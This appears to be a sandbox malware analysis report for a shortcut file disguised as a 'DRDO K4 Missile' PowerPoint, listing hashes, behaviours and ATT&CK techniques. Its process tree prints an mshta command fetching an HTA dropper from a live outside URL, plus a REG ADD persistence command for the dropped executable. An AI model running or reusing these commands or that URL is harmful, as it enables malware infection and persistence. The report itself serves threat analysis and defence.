9aed0c5a047959ef38ec0555ccb647688c67557a6f8f60f691ab0ec096833cce

General

Target

DRDO-K4-Missile-Clean-room/DRDO - K4 Missile Clean room.pptx.lnk
Size

70KB
MD5

ab11b91f97d7672da1c5b42c9ecc6d2e
SHA1

feeadc91373732d65883c8351a6454a77a063ff5
SHA256

a2e55cbd385971904abf619404be7ee8078ce9e3e46226d4d86d96ff31f6bb9a
SHA512

d788a83a323d04b9c43328d36adcc2ffc3b7fd52e1bdec3f7bbd7c9c14bb66d75003ea8df5a9ba60b798f5aacbfb684a4955c0b806347b1809f7290e75b826d9
SSDEEP

1536:ENN7MHOvYUpOQH8a8U2OPzCSyfU4YoBJrOZwHPnlThtIApDkU:hHOvY548a8Uxm5sx4JrOZIPlTHL

Score

10^/10

persistence

Malware Config

Extracted

Language

hta

Source

URLs

hta.dropper

https://cornerstonebeverly.org/js/files/docufentososo/doecumentosoneso

Signatures

Blocklisted process makes network request 7 IoCs

flow	pid	Process
7	1444	mshta.exe
9	1444	mshta.exe
12	1444	mshta.exe
16	1444	mshta.exe
17	1444	mshta.exe
29	1444	mshta.exe
30	1444	mshta.exe

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\Control Panel\International\Geo\Nation	mshta.exe

Executes dropped EXE 1 IoCs

pid	Process
3412	cridviz.exe

Loads dropped DLL 1 IoCs

pid	Process
3412	cridviz.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Update Schedule = "C:\\Users\\Public\\hp\\cridviz.exe"	reg.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	POWERPNT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	POWERPNT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	POWERPNT.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	POWERPNT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	POWERPNT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	POWERPNT.EXE

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000_Classes\Local Settings	mshta.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
3968	POWERPNT.EXE

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
1364	mshta.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	1444	mshta.exe
Token: SeDebugPrivilege	1364	mshta.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
3968	POWERPNT.EXE

Suspicious use of SetWindowsHookEx 4 IoCs

pid	Process
3968	POWERPNT.EXE
3968	POWERPNT.EXE
3968	POWERPNT.EXE
3968	POWERPNT.EXE

Suspicious use of WriteProcessMemory 17 IoCs

description	pid	Process	procid_target
PID 2144 wrote to memory of 1444	2144	cmd.exe	87
PID 2144 wrote to memory of 1444	2144	cmd.exe	87
PID 1444 wrote to memory of 3968	1444	mshta.exe	88
PID 1444 wrote to memory of 3968	1444	mshta.exe	88
PID 1444 wrote to memory of 3968	1444	mshta.exe	88
PID 1444 wrote to memory of 1364	1444	mshta.exe	89
PID 1444 wrote to memory of 1364	1444	mshta.exe	89
PID 1444 wrote to memory of 1364	1444	mshta.exe	89
PID 1364 wrote to memory of 4492	1364	mshta.exe	97
PID 1364 wrote to memory of 4492	1364	mshta.exe	97
PID 1364 wrote to memory of 4492	1364	mshta.exe	97
PID 4492 wrote to memory of 4512	4492	cmd.exe	99
PID 4492 wrote to memory of 4512	4492	cmd.exe	99
PID 4492 wrote to memory of 4512	4492	cmd.exe	99
PID 1364 wrote to memory of 3412	1364	mshta.exe	100
PID 1364 wrote to memory of 3412	1364	mshta.exe	100
PID 1364 wrote to memory of 3412	1364	mshta.exe	100

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\DRDO-K4-Missile-Clean-room\DRDO - K4 Missile Clean room.pptx.lnk"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2144
- C:\Windows\System32\mshta.exe
  "C:\Windows\System32\mshta.exe" https://cornerstonebeverly.org/js/files/docufentososo/doecumentosoneso
  2⤵
  - Blocklisted process makes network request
  - Checks computer location settings
  - Modifies registry class
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1444
- - C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" "C:\Users\Admin\AppData\Local\Temp\DRDO - K4 Missile Clean room.pptx" /ou ""
    3⤵
    - Checks processor information in registry
    - Enumerates system info in registry
    - Suspicious behavior: AddClipboardFormatListener
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SetWindowsHookEx
    PID:3968
- - C:\Windows\SysWOW64\mshta.exe
    "C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\HP\jquery.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
    3⤵
    - Checks computer location settings
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1364
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\test.bat" "
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4492
    - - C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Windows Update Schedule" /t REG_SZ /F /D "C:\Users\Public\hp\cridviz.exe"
        5⤵
        Adds Run key to start application
        
        PID:4512
  - - C:\Users\Public\hp\cridviz.exe
      "C:\Users\Public\hp\cridviz.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:3412

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

1

T1060

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

Query Registry

3

T1012

System Information Discovery

4

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\HP\jquery.hta

Filesize
177KB

MD5
036da574b5967c71951f4e14d000398c

SHA1
e612dbb34e01b41e46359019db9340e17e0390b8

SHA256
85faf414ed0ba9c58b9e7d4dc7388ba5597598c93b701d367d8382717fb485ec

SHA512
1afbfd044a039109d5d5f8f451307fdb83f66128c5b33d06c3685aabb2efbf97009680128b2f9e901b43d2f852d615e25c8012b6e7c67cbdaca7fe43c5945955

Download Submit
C:\Users\Admin\AppData\Local\Temp\DRDO - K4 Missile Clean room.pptx

Filesize
1.6MB

MD5
24f210da9fb419ea30c2d435a3dfd469

SHA1
7143a1071708fdc4be06b0b8f5fdcb66ec8d8f93

SHA256
b9514ed1566c8ce46ab5bfd665f8b997f2d5624740f298699df43bb108e08c4d

SHA512
77944b204b644c2b74b3f6deb5f78229ac78bb4bebc19e6ffb65db1003773b2373ec4cd6255914d397bc4a797c2014804e297efd25845aebaa5492574a453a84

Download Submit
C:\Users\Admin\AppData\Local\Temp\test.bat

Filesize
151B

MD5
05f9ac07249121d89cd4416ef466671c

SHA1
1e35984ccc3f685d05996a9383b0dfa297bfa571

SHA256
f0cc9b18ba32f95085d5f9a3539dc08832c19e7d3124a5febbdc3bae47deab24

SHA512
456c0133e5ecbc25137fa2bdcf524947cd5afb976a872279f4ba30ae3d64a0af0049b163f2319587f4cbf54a5d1b60943f4bd16528e3343af6e6e6fcf0133aa1

Download Submit
C:\Users\Public\hp\DUser.dll

Filesize
226KB

MD5
2e19b7a2bbdc8082024d259e27e86911

SHA1
3c4c8cbab1983c775e6a76166f7b3c84dde8c8c5

SHA256
865e041b41b9c370a4eed91a9a407bd44a94e16e236e07be05e87de319a4486c

SHA512
9e87e0a1bb0181a0f705bd2dff6d092e4355c2ee1e689d98f642fc9529f07f3f6de68cd376afea901e90dd784de9b1b1bcb4144eba88a90297b6c6cdd2203703

Download Submit
C:\Users\Public\hp\DUser.dll

Filesize
226KB

MD5
2e19b7a2bbdc8082024d259e27e86911

SHA1
3c4c8cbab1983c775e6a76166f7b3c84dde8c8c5

SHA256
865e041b41b9c370a4eed91a9a407bd44a94e16e236e07be05e87de319a4486c

SHA512
9e87e0a1bb0181a0f705bd2dff6d092e4355c2ee1e689d98f642fc9529f07f3f6de68cd376afea901e90dd784de9b1b1bcb4144eba88a90297b6c6cdd2203703

Download Submit
C:\Users\Public\hp\cridviz.exe

Filesize
29KB

MD5
9b726550e4c82bbeb045150e75fee720

SHA1
e42d4d119e7ed4104f89e9242439003328320540

SHA256
2156279eac34cc622f755766de61090290ff8b0960ebb46b03038ae321b3566d

SHA512
bc919b76d0dc34af5156d170bcdc80d46218810d144fcceba7acdf0aa6069c9b66569750cdd2dedc4b503a0a823c57ceb169f0441e552161900e6e7601efb3c9

Download Submit
C:\Users\Public\hp\cridviz.exe

Filesize
29KB

MD5
9b726550e4c82bbeb045150e75fee720

SHA1
e42d4d119e7ed4104f89e9242439003328320540

SHA256
2156279eac34cc622f755766de61090290ff8b0960ebb46b03038ae321b3566d

SHA512
bc919b76d0dc34af5156d170bcdc80d46218810d144fcceba7acdf0aa6069c9b66569750cdd2dedc4b503a0a823c57ceb169f0441e552161900e6e7601efb3c9

Download Submit
memory/1364-185-0x0000000009790000-0x00000000097A0000-memory.dmp

Filesize
64KB

Download
memory/1444-160-0x000001F375E20000-0x000001F375EDD000-memory.dmp

Filesize
756KB

Download
memory/1444-147-0x000001F376EC0000-0x000001F376ED0000-memory.dmp

Filesize
64KB

Download
memory/3968-183-0x00007FFAE9A50000-0x00007FFAE9A60000-memory.dmp

Filesize
64KB

Download
memory/3968-180-0x00007FFAE9A50000-0x00007FFAE9A60000-memory.dmp

Filesize
64KB

Download
memory/3968-181-0x00007FFAE9A50000-0x00007FFAE9A60000-memory.dmp

Filesize
64KB

Download
memory/3968-182-0x00007FFAE9A50000-0x00007FFAE9A60000-memory.dmp

Filesize
64KB

Download
memory/3968-161-0x00007FFAE71F0000-0x00007FFAE7200000-memory.dmp

Filesize
64KB

Download
memory/3968-162-0x00007FFAE71F0000-0x00007FFAE7200000-memory.dmp

Filesize
64KB

Download
memory/3968-157-0x00007FFAE9A50000-0x00007FFAE9A60000-memory.dmp

Filesize
64KB

Download
memory/3968-155-0x00007FFAE9A50000-0x00007FFAE9A60000-memory.dmp

Filesize
64KB

Download
memory/3968-154-0x00007FFAE9A50000-0x00007FFAE9A60000-memory.dmp

Filesize
64KB

Download
memory/3968-153-0x00007FFAE9A50000-0x00007FFAE9A60000-memory.dmp

Filesize
64KB

Download
memory/3968-152-0x00007FFAE9A50000-0x00007FFAE9A60000-memory.dmp

Filesize
64KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads